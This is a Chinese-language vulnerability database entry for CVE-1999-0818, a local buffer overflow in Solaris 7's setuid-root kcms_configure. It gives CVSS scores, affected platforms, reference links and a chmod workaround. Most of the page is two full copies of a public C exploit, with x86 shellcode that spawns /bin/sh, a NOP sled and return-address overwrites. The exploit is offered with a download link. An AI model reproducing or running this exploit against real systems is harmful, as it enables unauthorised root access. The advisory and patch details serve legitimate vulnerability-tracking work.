CVE-1999-0818
CVSS7.2
发布时间 :1999-11-20 00:00:00
修订时间 :2008-09-09 08:35:41
NMCOES    

[原文]Buffer overflow in Solaris kcms_configure via a long NETPATH environmental variable.


[CNNVD]Solaris kcms_配置漏洞(CNNVD-199911-065)

        Solaris kcms_configure存在缓冲区溢出漏洞。该漏洞可由一个长NETPATH环境变量引起。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:7.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0818
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0818
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-065
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/831
(UNKNOWN)  BID  831
http://www.securityfocus.com/templates/archive.pike?list=1&msg=38433B7F5A.53F4SHADOWPENGUIN@fox.nightland.net
(UNKNOWN)  BUGTRAQ  19991130 another hole of Solaris7 kcms_configure

- 漏洞信息

Solaris kcms_配置漏洞
高危 缓冲区溢出
1999-11-20 00:00:00 2005-10-20 00:00:00
本地  
        Solaris kcms_configure存在缓冲区溢出漏洞。该漏洞可由一个长NETPATH环境变量引起。

- 公告与补丁

        A temporary solution is to chmod 400 /usr/openwin/bin/kcms_configure. This will prevent local users from running the the affected program.
        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.
        Sun Solaris 7.0 _x86
        

  •         Sun 107339-01x86
            

  •         

        Sun Solaris 7.0
        

  •         Sun 107337-01sparc
            

  •         

- 漏洞信息 (19647)

Solaris 7.0 kcms_configure (EDBID:19647)
solaris local
1999-11-30 Verified
0 UNYUN
N/A [点击下载]
source: http://www.securityfocus.com/bid/831/info

The binary kcms_configure, part of the Kodak Color Management System package shipped with OpenWindows (and ultimately, Solaris) is vulnerable to a local buffer overflow. The buffer which the contents of the environment variable NETPATH are copied into has a predetermined length, which if exceeded can corrupt the stack and cause aribtrary code hidden inside of the oversized buffer to be executed. kcms_configure is installed setuid root and exploitation will result in a local root compromise. 

------ ex_kcms_configure86.c
/*=============================================================================
kcms_configure Exploit for Solaris7 Intel Edition
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/

#define ENV "NETPATH="
#define MAXBUF 3000
#define RETADR 2088
#define RETOFS 0xad0
#define FAKEADR 2076
#define NOP 0x90

unsigned long get_sp(void)
{
__asm__(" movl %esp,%eax ");
}

char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";

main()
{
char buf[MAXBUF];
unsigned int i,ip,sp;

putenv("LANG=");
sp=get_sp();
printf("ESP=0x%x\n",sp);

memset(buf,NOP,MAXBUF);

ip=sp;
buf[FAKEADR ]=ip&0xff;
buf[FAKEADR+1]=(ip>>8)&0xff;
buf[FAKEADR+2]=(ip>>16)&0xff;
buf[FAKEADR+3]=(ip>>24)&0xff;

ip=sp-RETOFS;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;

strncpy(buf+2500,exploit_code,strlen(exploit_code));

strncpy(buf,ENV,strlen(ENV));
buf[MAXBUF-1]=0;
putenv(buf);

execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0);
} 		

- 漏洞信息

1783
Solaris kcms_configure NETPATH Environment Variable Handling Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

kcms_configure as included with Solaris 7 and 8 allows a local attacker to gain additional privileges via a buffer overflow in a command line argument.

- 时间线

1999-11-30 Unknow
1999-11-30 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Solaris kcms_configure
Boundary Condition Error 831
No Yes
1999-11-30 12:00:00 2009-07-11 12:56:00
This was first posted to BugTraq by UNYUN <shadowpenguin@backsection.net> on November 30, 1999.

- 受影响的程序版本

Sun Solaris 7.0_x86
Sun Solaris 7.0

- 漏洞讨论

The binary kcms_configure, part of the Kodak Color Management System package shipped with OpenWindows (and ultimately, Solaris) is vulnerable to a local buffer overflow. The buffer which the contents of the environment variable NETPATH are copied into has a predetermined length, which if exceeded can corrupt the stack and cause aribtrary code hidden inside of the oversized buffer to be executed. kcms_configure is installed setuid root and exploitation will result in a local root compromise.

- 漏洞利用

------ ex_kcms_configure86.c
/*=============================================================================
kcms_configure Exploit for Solaris7 Intel Edition
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/

#define ENV "NETPATH="
#define MAXBUF 3000
#define RETADR 2088
#define RETOFS 0xad0
#define FAKEADR 2076
#define NOP 0x90

unsigned long get_sp(void)
{
__asm__(" movl %esp,%eax ");
}

char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";

main()
{
char buf[MAXBUF];
unsigned int i,ip,sp;

putenv("LANG=");
sp=get_sp();
printf("ESP=0x%x\n",sp);

memset(buf,NOP,MAXBUF);

ip=sp;
buf[FAKEADR ]=ip&amp;0xff;
buf[FAKEADR+1]=(ip&gt;&gt;8)&amp;0xff;
buf[FAKEADR+2]=(ip&gt;&gt;16)&amp;0xff;
buf[FAKEADR+3]=(ip&gt;&gt;24)&amp;0xff;

ip=sp-RETOFS;
buf[RETADR ]=ip&amp;0xff;
buf[RETADR+1]=(ip&gt;&gt;8)&amp;0xff;
buf[RETADR+2]=(ip&gt;&gt;16)&amp;0xff;
buf[RETADR+3]=(ip&gt;&gt;24)&amp;0xff;

strncpy(buf+2500,exploit_code,strlen(exploit_code));

strncpy(buf,ENV,strlen(ENV));
buf[MAXBUF-1]=0;
putenv(buf);

execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0);
}

- 解决方案

A temporary solution is to chmod 400 /usr/openwin/bin/kcms_configure. This will prevent local users from running the the affected program.

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.


Sun Solaris 7.0_x86
  • Sun 107339-01
    x86


Sun Solaris 7.0
  • Sun 107337-01
    sparc

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站